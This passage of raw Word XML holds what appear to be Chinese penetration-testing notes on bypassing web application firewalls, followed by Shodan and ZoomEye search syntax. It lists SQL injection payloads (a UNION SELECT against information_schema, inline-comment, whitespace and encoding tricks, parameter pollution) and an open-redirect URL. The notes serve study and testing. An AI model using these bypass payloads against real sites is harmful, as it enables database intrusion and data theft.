        <w:r w:rsidR="00A14128" w:rsidRPr="008F549A">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.landgrey.me/redirect.php?url=http://www.landgrey.me.www.evil.com/untrust.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F695782" w14:textId="69B8C391" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70337B06" w14:textId="72804582" w:rsidR="00A40993" w:rsidRDefault="00577B8E" w:rsidP="00577B8E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ex编码</w:t>
      </w:r>
      <w:r w:rsidR="00A40993">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="412873BD" wp14:editId="47ECFD77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5274310" cy="1359535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F0A10" w14:textId="77777777" w:rsidR="00C00103" w:rsidRDefault="00C00103" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">and /*!1*/=/*!2*/ union select /*!1*/,/*!table_name*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/ from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>=0x6A69616E limit 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4200F8" w14:textId="1A78FA2B" w:rsidR="00C00103" w:rsidRDefault="00E03C8D" w:rsidP="00E03C8D">
      <w:r>
        <w:t>Access可以利用的空白字符有：%09、%0a、%0c、%0d、%16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59362A87" w14:textId="77777777" w:rsidR="00336BC5" w:rsidRDefault="00336BC5" w:rsidP="00A40993">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00336BC5">
        <w:t>Access数据库中没有注释符号.因此  /**/   、 --   和   #   都没法使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369526A8" w14:textId="0963EADF" w:rsidR="00A40993" w:rsidRPr="00A40993" w:rsidRDefault="00A40993" w:rsidP="00A409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40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ASP+MSSQL:  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不支持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%a0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，已放弃。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F8BA20" w14:textId="77777777" w:rsidR="00A40993" w:rsidRPr="00A40993" w:rsidRDefault="00A40993" w:rsidP="00A409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40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ASPX+MSSQL: %a0+%0a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配合，可成功绕过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union select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的检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362BFE1" w14:textId="77777777" w:rsidR="00A40993" w:rsidRPr="00A40993" w:rsidRDefault="00A40993" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252C1F49" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/huanghelouzi/article/details/82995313</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8EA4B" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00C51675" w:rsidP="00BB29BE">
      <w:hyperlink r:id="rId108" w:history="1">
        <w:r w:rsidR="004F1A15" w:rsidRPr="0052521C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/201790.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5901109E" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="18E76148" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRPr="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2697">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>防火墙，一般都采用正则的方式进行拦截的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8BBF80" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="2F3E821E" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础绕过大小写、双重写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12930A" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRPr="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00531A8E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567482"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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协议层面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的检测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协议未覆盖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请求方式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get  -&gt;  post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content-type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参数污染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index.php?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&amp;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可能只检测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</w:p>
    <w:p w14:paraId="3F9FADD1" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRPr="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="6BDBF3D4" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7026021A" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在/*之间插入内容*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>/*!50000select*/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B8379" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>http://www.hacker.com/news/index.jsp?id=2862′ and/*%23%0a*/1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FA5AF" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="3563CD44" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRPr="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00531A8E">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F5F9"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="567482"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者/**/代替空格 例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6875D" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>等价替换：and -&gt; &amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00531A8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、%26%26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43D692" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>or -&gt; ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746AA82B" w14:textId="77777777" w:rsidR="005B74A2" w:rsidRDefault="006D676B" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blanks=('%09', '%0A', '%0B', '%0C', '%0D', '%a0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B8C70" w14:textId="35FE3602" w:rsidR="006D676B" w:rsidRDefault="005B74A2" w:rsidP="00BB29BE">
      <w:r w:rsidRPr="005B74A2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中可以利用的空白字符有：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%09,%0a,%0b,%0c,%0d,%20,%a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18975FA9" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE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B3E65A7" wp14:editId="03CE9C3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802130"/>
            <wp:effectExtent l="0" t="0" r="254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BC991" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:r>
        <w:t>1、最常见形式 %20、+、/**/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0A8BA" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8"/>
    <w:p w14:paraId="08E5B460" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:r>
        <w:t>2、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>中可以利用的空白字符有：%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>09,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0a,%0b,%0c,%0d,%20,%a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F458151" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8"/>
    <w:p w14:paraId="587EF457" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:r>
        <w:t>3、内联注释 /!12345select/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19708772" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8"/>
    <w:p w14:paraId="0D08F217" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过组合测试，可以发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> union%0a/!12345select/ 1,2 可以绕过防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C0F62" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A26F0D4" w14:textId="77777777" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023D8800" w14:textId="77434CFE" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D9724EC" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>se%le%ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A7018B2" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="397066E4" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="282806FB" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="22A08FF8" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="0095496E" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用注释符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFED32" w14:textId="77777777" w:rsidR="0095496E" w:rsidRPr="0095496E" w:rsidRDefault="0095496E" w:rsidP="009549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//，-- , /**/, #, --+, -- -, ;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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00,--a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB514F" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="316B1BBE" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="0095496E" w:rsidP="00BB29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLEncode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASCII,HEX,unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75140BE8" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="1D19B2DA" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="7DEF1A80" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="58D8A160" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="09B3C9E7" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="51555738" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRPr="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="51FFD0F1" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>搜索引擎的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFF7FF8" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>hodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD45CE" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCBBB37" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED9FC7B" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB7C9CF" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C5DCD8" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B631B8" w14:textId="77777777" w:rsidR="008027AB" w:rsidRPr="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199E4560" w14:textId="77777777" w:rsidR="00D11994" w:rsidRPr="008027AB" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>oomeye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67D82C12" w14:textId="77777777" w:rsidR="00103D75" w:rsidRDefault="00103D75" w:rsidP="00103D75">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app:apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ------------ 组件名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、ver:2.2.9 ------------- 版本号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3、 port:22 ----------- 端口号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service:ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ------------- </w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索服务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>5、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os:linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --------- 操作系统类型</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>6、hostname:google.com ------------- 分析列表“主机名”字段</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>7、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>country:cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>city:hefei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--------------查找国家</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>代码谷歌浏览器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>翻墙查看</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://link.jianshu.com?t=https:/zh.wikipedia.org/wiki/%E5%9B%BD%E5%AE%B6%E5%9C%B0%E5%8C%BA%E4%BB%A3%E7%A0%81" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>此链接当前页"互联网"字段或“ISO 3166 2位字母代码”字段（注：英国gb）</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>8、ip:8.8.8.8 ------------</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>9、cidr:8.8.8.8/24--------</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>地址网</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F9138" w14:textId="77777777" w:rsidR="00103D75" w:rsidRDefault="00103D75" w:rsidP="00103D75">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:t xml:space="preserve">实例：php </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003853C3">
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:t>edeCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003853C3">
